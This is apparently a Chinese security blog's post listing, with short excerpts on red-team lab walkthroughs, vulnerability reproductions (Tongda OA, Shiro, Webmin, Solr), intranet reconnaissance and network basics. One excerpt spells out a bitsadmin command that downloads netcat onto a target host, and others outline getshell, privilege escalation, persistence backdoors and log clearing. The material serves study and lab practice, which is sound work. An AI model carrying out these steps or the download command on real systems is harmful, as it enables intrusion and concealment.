自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(61)
  • 收藏
  • 关注

转载 WEB 安全—深入学习命令执行漏洞

在命令执行上下文中,|、||、& 和 && 是用于控制命令执行的操作符。它们在使用和行为上有所不同:管道操作符 |:作用:将前一个命令的输出作为后一个命令的输入,用于连接多个命令的执行结果。示例:command1 | command2,将 command1 的输出作为 command2 的输入。逻辑或操作符 ||:作用:用于在命令执行时,只有前一个命令执行失败(返回非零退出状态码)时才执行后续的命令。

2023-06-17 10:49:28 876

原创 【Window 入侵排查】

通过PowerShell进行查询最常用的两个命令是【Get-EventLog】和【Get-WinEvent】,两者的区别是【Get-EventLog】只获取传统的事件日志,而【Get-WinEvent】是从传统的事件日志(如系统日志和应用程序日志)和新Windows事件日志技术生成的事件日志中获取事件,其还会获取Windows事件跟踪(ETW)生成的日志文件中的事件。Windows系统中的进程排查,主要是找到恶意进程的PID、程序路径,有时还需要找到PPID(PID的父进程)及程序加载的DLL。

2023-01-31 14:40:31 1484

原创 一、java编写登录功能

1. 编写login . html登录页面username & password 两个输入框 2. 使用 Druid 数据库连接池技术 , 操作mysql,数据库中创建user表 3. 使用 JdbcTemplate 技术封装 JDBC 4. 登录成功跳转到 SuccessServlet 展示:登录成功!用户名 , 欢迎您 5. 登录失败跳转到 FailServlet 展示:登录失败,用户名或密码错误。

2023-01-12 17:42:08 5378

原创 ATT&CK实战系列—红队实战-5

ATT&CK实战系列—红队实战-50、靶场介绍1、信息收集2、漏洞分析2.1 漏洞挖掘2.2 漏洞验证3、漏洞利用3.1 ThinkPHP 5.0.22 getshell3.2 主机信息收集4、权限提升4.1 ​S 使用 msf 提权4.2 dump Hash4.3 远程登录5、权限维持5.1 任务计划6、横向渗透6.1 搭建 socks 代理6.2 内网信息收集6.3 横向渗透--域控7、痕迹清理0、靶场介绍ATT&CK第五个攻防靶场已经出来了,此次靶场虚拟机共用两个,一个外网一个内网

2021-04-28 09:05:40 1191

原创 ATT&CK实战系列—红队实战-4

0、靶场介绍靶场下载、配置参考:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/靶场配置后需要自行开启 vulhub 里面的三个漏洞。1、信息收集2、漏洞分析该阶段为漏洞挖掘、漏洞扫描、漏洞验证2.1 struts2 漏洞struts2 漏洞检查工具:https://github.com/HatBoy/Struts2-Scanhttps://github.com/shack2/Struts2VulsToolshttps://git

2021-04-27 19:02:24 1401

原创 ATT&CK实战系列—红队实战-3

ATT&CK实战系列—红队实战-30、靶场介绍1、信息收集2、漏洞分析2.1 漏洞挖掘2.2 漏洞扫描2.3 漏洞验证3、漏洞利用​3.1 Joomala Getshell3.2 主机信息收集3.3 敏感信息收集4、权限提升4.1 脏牛提权5、权限维持5.1 添加 root 后门6、横向渗透6.1 搭建 socks5 代理6.2 内网主机探测6.3 端口探测6.4 漏洞扫描6.5 域内横向--域成员6.6 域内横向--域控6.7 拿到 FLAG7、痕迹清理7.1 Linux7.2 windows0

2021-04-27 18:40:41 1436 1

原创 ATT&CK实战系列—红队实战-2

ATT&CK实战系列—红队实战-20、靶场简介1、信息收集2、漏洞分析2.1 漏洞扫描2.2 漏洞验证3、漏洞利用3.1 CVE-2019-2725 Getshell3.2 主机信息收集4、权限提升4.1 使用 msf 提权4.2 CVE-2019-1388:Windows UAC 本地提权4.3 获取hash&账号密码5、权限维持--注册表运行键5.1 Metasploit 内置模块5.2 命令行--手工创建6、横向渗透6.1 代理转发6.2 域内信息收集6.3 内网横向--域控1、使用

2021-04-27 17:48:51 966 1

原创 ATT&CK实战系列—红队实战-1

ATT&CK实战系列—红队实战-10、靶场介绍1、信息收集2、漏洞分析2.1 漏洞挖掘2.2 漏洞扫描2.3 漏洞验证3、漏洞利用​3.1 Yxcms 后台 Getshell3.2 phpmyadmin 日志 getshell3.2 主机信息收集4、权限提升4.1 使用 msf 提权4.2 dump hash4.3 远程登录5、权限维持5.1 guest 后门6、横向渗透6.1 代理转发6.2 信息收集6.3 横向渗透--域成员6.4 横向渗透--域控7、痕迹清理0、靶场介绍ATT&CK

2021-04-26 19:28:05 1075 3

原创 内网渗透--上传与下载

内网渗透--上传与下载内网渗透–上传与下载使用bitsadmin 进行下载使用powershell 进行下载使用 certutil 进行下载使用 WGET 进行下载内网渗透–上传与下载对于不用直接上传而且只能通过命令行执行的shell,我们可以通过以下的方法对文件进行上传和下载。使用bitsadmin 进行下载下载命令:bitsadmin /transfer n http://172.16.12.128/NC.exe E:\nc.exe使用powershell 进行下载本地下载:power

2020-11-30 18:17:27 1028

原创 内网渗透--压缩数据

内网渗透--压缩数据使用WinRAR 工具进行解压缩1、以RAR 格式压缩/解压2、分卷压缩/解压使用7-Zip 工具进行解压缩1、普通压缩解压方式2、分卷压缩/解压方式在渗透测试中,数据的下载也是重要的一部分,通常我们使用winrar、7-zip 进行压缩数据而后进行下载。使用WinRAR 工具进行解压缩 目标机器上安装了 WinRAR,可以直接使用;如果没有安装,可以在本地下载并安装,然后把 WinRAR安装目录里的 rar.exe文件提取出来,上传到目标机器中(安装 WinRAR的

2020-11-30 18:12:24 633

原创 内网渗透--建立隐藏通信隧道

内网渗透--建立隐藏通信隧道

2020-11-30 18:08:09 361

原创 隐藏通信隧道-判断内网连通性

隐藏通信隧道-判断内网连通性完成内网信息收集后,我们需要判断流量是否出得去,进得来。隐藏通信隧道技术常用于在访问受限的网络环境中追踪数据流向和在非受信任的网络中实现安全的数据传输。判断内外的连通性是指判断机器能否上外网等。要综合判断各种协议(TCP、HTTP、DNS、ICMP等)及端口通信等情况。常见的允许流量流出的端口有80、8080、443、53、110、123等。—-《内网安全攻防–渗透测试实战指南》1、ICMP 协议使用ping 命令进行探测:ping <ip地址或者域名>

2020-10-29 17:30:12 347

原创 信息收集--域内信息收集

域内信息收集一、收集域内基础信息1.查询域2.查询此域内所有计算机3.查询域内所有用户组列表4.查询所有域成员计算机列表5.获取域密码信息6.获取域信任信息二、查找域控制器1.查看域内控制器的机器名2.查看域控制器的主机名3.查看当前时间4.查看域控制器组三、获取域内的用户和管理员信息1.查询所有域用户列表2.查询域管理员用户组四、定位域管理员1.常用域管理员定位工具五、查找域管理进程1.本机检查2. 查询域控制器的域用户会话3. 扫描远程系统上运行的任务4. 扫描远程系统上 NetBIOS 信息5. 利用

2020-10-29 17:25:58 2398

原创 信息收集--端口探测

探测内网端口1.利用 Telnet 命令进行扫描2.利用 S 扫描器3.利用 Metasploit 端口扫描4.PowerSploit 下的 Invoke-portscan.ps1 模块5.Nishang 下的 Invoke-PortScan 模块1.利用 Telnet 命令进行扫描Telnet 协议是 TCP/IP 协议族的一员,是 Internet 远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在使用者计算机上使用 Telnet 程序,可以连接到目标服务器。

2020-09-25 16:08:17 501

原创 信息收集--主机存活

信息收集--主机存活探测内网存活主机1.利用 NetBIOS 快速探测内网2.利用 ICMP 协议快速探测内网3.利用 ARP 扫描探测内网4.利用 TCP/UDP 端口扫描探测内网探测内网存活主机内网存活主机的探测是内网渗透中不可或缺的一个环节。在扫描的时候,应尽量避免使用 Namp等工具进行暴力扫描.要尽量使用目标系统自带的各种工具,推荐使用 PowerShell 脚本。对于 Windows 7以下版本的系统,可以使用 VBS 脚本。在探测时,可在白天和夜间分别探测,以对比分析存活主机和对应的 I

2020-09-25 16:03:34 515

原创 信息收集--判断是否有域

信息收集–判断是否有域搜集完本机相关信息后,接下来,就要判断当前内网是否有域。如果有,需要判断所控主机是否在域内。1.使用 ipconfig 命令使用以下命令,查看网关 IP 地址、DNS 的 IP 地址、本地地址是否和 DNS 服务器为同一网段、域名等.C:\Windows\Temp>ipconfig /allWindows IP 配置主机名 . . . . . . . . . . . . . : Srv-DB-0day主 DNS 后缀 . . . . . . . . . . .

2020-08-31 09:04:55 2209

原创 信息收集--本机信息

信息收集--本机信息本机信息收集一、手工信息收集1. 查询网络配置信息2.查询操作系统及安装软件的版本信息3.查询本机服务信息4.查询进程列表5.查看启动程序信息6.查看计划任务7.查看主机开机时间8.查询用户列表9.列出或断开本地计算机和连接的客户端的会话10.查询端口列表11.查询补丁列表12.查询本机共享13.查询路由表及所有可用接口的 ARP 缓存表14.查询防火墙相关配置15.查看计算机代理配置情况16.查询并开启远程连接服务17.查询当前权限、账号信息二、自动化信息收集本机信息收集不管是在

2020-08-31 08:57:33 1116

原创 python(pip) 2&3 安装配置

python 2&3(pip) 配置安装Python 安装包下载安装python2和python3修改python文件添加Python2\3 路径到环境变量pip2和pip3的设置Python 安装包下载根据自需下载相应版本。下载链接:https://www.python.org/downloads/windows/安装python2和python3安装路径自定义即可,然后next到完成。修改python文件修改python2目录下python.exe为python2.exe,修改py

2020-07-08 15:43:26 422

原创 通达OA远程命令执行漏洞利用复现(exp,getshell)

通达OA远程命令执行漏洞利用复现一、漏洞描述二、环境搭建三、影响版本四、漏洞复现五、工具使用一、漏洞描述通达OA是由北京通达信科科技有限公司开发的一款办公系统,前一段时间通达官方在其官网发布了安全提醒与更新程序,并披露有用户遭到攻击。攻击者可在未授权的情况下可上传图片木马文件,之后通过精心构造的请求进行文件包含,实现远程命令执行,且攻击者无须登陆认证即可完成攻击。二、环境搭建1、通达OA下载后,一键安装下载地址:http://www.tongda2000.com/download/down.php

2020-07-07 15:00:20 4330 1

原创 Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)

Apache Shiro 1.2.4反序列化漏洞漏洞描述漏洞环境漏洞复现漏洞描述Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。漏洞环境环境下载后,执行如下命令启动一个使用了Apac

2020-07-03 14:16:48 781

原创 ThinkPHP 2.x 任意代码执行漏洞

ThinkPHP 2.x 任意代码执行漏洞漏洞描述环境搭建漏洞复现参考链接漏洞描述ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:KaTeX parse error: Undefined control sequence: \w at position 23: …reg_replace('@(\̲w̲+)'.depr.’([^’.KaTeX parse error: Undefined control sequence: \/ at position 7: depr.

2020-06-29 10:19:51 1692

原创 JDK环境变量配置

JDK环境变量配置1、配置环境变量2、测试是否成功1、配置环境变量右击“我的电脑”–>“属性”–>“高级系统设置”–>“高级”–>“环境变量”在系统变量里新建"JAVA_HOME"变量,变量值为:C:\ProgramFiles\Java\jdk1.8.0_60(JDK的安装路径);在系统变量里新建"classpath"变量 .;%JAVA_HOME%\lib;...

2020-06-24 10:12:41 95

原创 (CVE-2019-10758)mongo-express 远程代码执行漏洞复现

mongo-express 远程代码执行漏洞漏洞描述漏洞环境漏洞复现漏洞描述mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。漏洞环境环境搭建:https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758执行如下命令启动一个0.53.0版本的mo

2020-06-18 18:17:26 570

原创 Django GIS SQL注入漏洞复现(CVE-2020-9402)

Django GIS SQL注入漏洞复现漏洞详情漏洞环境漏洞复现漏洞详情Django是Django基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。 Django 1.11.29之前的1.11.x版本、2.2.11之前的2.2.x版本和3.0.4之前的3.0.x版本中存在SQL注入漏洞。攻击者可借助特制的SQL语句利用该漏洞查看、添加、修改或删除数据库中的信息。漏洞环境环境搭建,环境启动后,访问http://your-ip:8000即可看到Dja

2020-06-17 14:45:07 2032

原创 Django JSONField/HStoreField SQL注入漏洞(CVE-2019-14234)

Django JSONField/HStoreField SQL注入漏洞漏洞描述:环境搭建:漏洞复现:漏洞描述:Django是一个大而全的Web框架,其支持很多数据库引擎,包括Postgresql、Mysql、Oracle、Sqlite3等,但与Django天生为一对儿的数据库莫过于Postgresql了,Django官方也建议配合Postgresql一起使用。Django在2019年8月1日发布了一个安全更新,修复了在JSONField、HStoreField两个模型字段中存在的SQL注入漏洞。

2020-06-15 15:08:15 595

原创 Vulnhub 靶机--Raven

Vulnhub 靶机--Raven1、信息收集2、获取shell3、提权1、信息收集在这里发现了一个PHPmailer 存在命令执行漏洞2、获取shell在GitHub 找了一个exp,修改目标IP、目录、端口后,执行脚本访问http://172.16.200.166/contact.php,此时就会生成后门文件shell.phpkali开启监听,然后访问:http://172.16.200.166/shell.php 获取shell:3、提权在主机信息收集中获取mysql 账

2020-06-13 21:50:51 324

原创 Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)

Apache Solr Velocity 注入远程命令执行漏洞 漏洞描述影响版本漏洞环境漏洞复现漏洞描述Solr是Apache Lucene项目的开源企业搜索平台。 其主要功能包括全文检索、命中标示、分面搜索、动态聚类、数据库集成,以及富文本的处理。 2019年10月30日,国外安全研究人员放出了一个关于solr 模板注入的exp,攻击者通过未授权访问solr服务器,发送特定的数据包开启 params.resource.loader.enabled,然后get访问接口导致服务器命令执行。影响版本5

2020-06-12 18:00:29 2962

原创 Webmin 远程命令执行漏洞(CVE-2019-15107)

Webmin 远程命令执行漏洞(CVE-2019-15107)漏洞描述:影响版本:环境搭建:漏洞利用:漏洞描述:Webmin是一款功能强大的基于Web的系统管理工具,被广泛应用于Unix系统,由于Webmin中Password_Change.cgi在接收请求的处理过程中,old参数存在命令注入漏洞,可被攻击者恶意利用。当用户开启Webmin密码重置功能后,攻击者利用该漏洞可在易受损系统中执行任意命令,进而获取系统Shell。影响版本:Webmin 1.920及以下版本环境搭建:环境搭建:http

2020-06-12 15:51:25 636

原创 通达OA任意用户登录复现(最新)

通达OA任意用户登录复现0x00 漏洞简介0x01 影响版本0x02 环境搭建0x03 漏洞复现0x04 修复建议0x00 漏洞简介通达OA国内常用的办公系统,使用群体,大小公司都可以,其此次安全更新修复的高危漏洞为任意用户登录漏洞。攻击者在远程且未经授权的情况下,通过利用此漏洞,可以直接以任意用户身份登录到系统。0x01 影响版本通达OA 2017版通达OA V11.X<V11....

2020-04-28 20:57:02 4248

原创 VulnHub 靶场--October

VulnHub 靶场--October靶场搭建:靶场渗透:00x1: 信息收集00x2: 漏洞利用00x3: 系统提权00x4: SSH登录靶场搭建:下载完导入虚拟机,然后使用默认桥接模式即可。下载链接:https://www.vulnhub.com/entry/its-october-1,460/如果出现IP无法分配可参考:https://www.cnblogs.com/yichen...

2020-04-22 19:41:26 693

原创 Weblogic Web 服务器的安全设置

Weblogic Web 服务器的安全设置Weblogic 简单介绍Weblogic 安全设置1、更改weblogic后台用户名密码策略2、账号锁定策略3、日志审计配置4、Weblogic header 设置5、限制应用服务器Socket 数量6、修改默认路径和端口Weblogic 简单介绍WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于...

2020-04-20 17:31:05 1943

原创 Apache 服务器的安全设置

Apache 服务器的安全设置Apache 简单介绍Apache 服务器的安全设置账号设置授权设置日志设置隐藏Apache 版本信息修改Apache默认首页禁止目录浏览限制目录执行权限删除缺省安装的无用文件自定义错误页面关闭 TRACE 功能禁用 CGI限制IP访问限制请求消息长度修改默认端口Apache 简单介绍Apache HTTP Server(简称Apache)是Apache软件基金...

2020-04-15 16:32:38 1201

原创 网络基础之NAT协议

NAT 的基本概念NAT(Network Address Translation,网络地址转换)是1994年提出的。当在专用网内部的一些主机本来已经分配到了本地IP地址(即仅在本专用网内使用的专用地址),但现在又想和因特网上的主机通信(并不需要加密)时,可使用NAT方法。这种方法需要在专用网连接到因特网的路由器上安装NAT软件。装有NAT软件的路由器叫做NAT路由器,它至少有一个有效的外部全...

2020-04-10 17:28:05 447

原创 网络基础之邮件传输协议

邮件传输过程通常,一封电子邮件的发送需要经过用户代理、客户端邮件服务器和服务端邮件服务器等三个程序的参与,并使用邮件传输协议(SMTP,POP3或IMAP)来发送和获取邮件。使用邮件客户端收发邮件电子邮件从 A 发送到客户服务器是使用 SMTP 协议。两个邮件服务器之间的传送使用 SMTP。B从服务端邮件服务器获取邮件使用POP3或IMAP协议。常见的邮件客户端有Foxmail,Outl...

2020-04-10 10:57:26 2300

原创 网络基础之ICMP 协议

网络基础之ICMP 协议ICMP 简介ICMP 工作原理ICMP 报文常见的ICMP报文相应请求目标不可达,源抑制和超时报文时间戳请求ICMP 类型ICMP 应用ICMP 安全性ICMP 简介ICMP是(Internet Control Message Protocol)Internet控制报文协议。 ICMP协议是一种面向无连接的协议,它是TCP/IP协议族的一个子协议,用于在IP主机、路...

2020-04-09 17:12:03 436

原创 网络基础 之SSL协议

网络基础 之SSL协议SSL 协议简介SSL 的功能SSL 的特性SSL 在协议在的位置SSL协议可分为两层SSL 协议工作原理SSL 协议简介SSL协议是一种国际标准的加密及身份认证通信协议。SSL(Secure Sockets Layer 安全套接层),及其继任者传输层安全(Transport Layer Security,TLS)是为网络通信提供安全及数据完整性的一种安全协议。TLS...

2020-04-08 16:28:13 1693

原创 网络基础之DNS服务和协议

网络基础之DNS服务和协议DNS 概念DNS 记录类型DNS 解析方法DNS 报文格式DNS 过程DNS的作用DNS 概念DNS( Domain Name System)是“域名系统”的英文缩写,是一种组织成域层次结构的计算机和网络服务命名系统,使用的是UDP协议的53号端口,它用于TCP/IP网络,它所提供的服务是用来将主机名和域名转换为IP地址的工作。DNS是一种客户/服务器服务模式,...

2020-04-07 17:14:53 287

原创 网络基础之HTTP协议

网络基础之HTTP协议HTTP协议简介HTTP的特点:HTTP工作原理HTTP的请求方法HTTP协议简介1、什么是超文本?包含有超链接(Link)和各种多媒体元素标记(Markup)的文本。这些超文本文件彼此链接,形成网状(Web),因此又被称为网页(Web Page)。这些链接使用URL表示。最常见的超文本格式是超文本标记语言HTML。2、什么是URL?URL即统一资源定位符(Unif...

2020-04-07 10:38:18 192

原创 网络基础之IP编址

网络基础之IP编址关于IP地址IP地址网络地址广播地址主机地址子网掩码缺省网关IP编址分类A类IP地址B类IP地址C类IP地址D类IP地址特殊的网址关于IP地址IP地址IP地址(Internet Protocol Address)是指互联网协议地址,又译为网际协议地址。是IP协议提供的一种统一的地址格式,它为互联网上的每一个网络和每一台主机分配一个逻辑地址,以此来屏蔽物理地址的差异。网络地...

2020-04-06 17:18:10 615

原创 网络基础之DHCP协议

协议学习之DHCPDHCP 概述:什么是DHCP?DHCP在协议栈中的位置DHCP的必要型采用DHCP的好处DHCP的结构DHCP的责任DHCP的基本工作流程发现阶段确认阶段DHCP 概述:随着网络规模的扩大和网络复杂度的提高,网络配置越来越复杂,经常出现计算机位置变化(如便携机或无线网络)和计算机数量超过可分配的IP地址的情况,这时我们经常需要用到动态主机配置协议DHCP(Dynamic H...

2020-04-04 14:18:29 1058

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除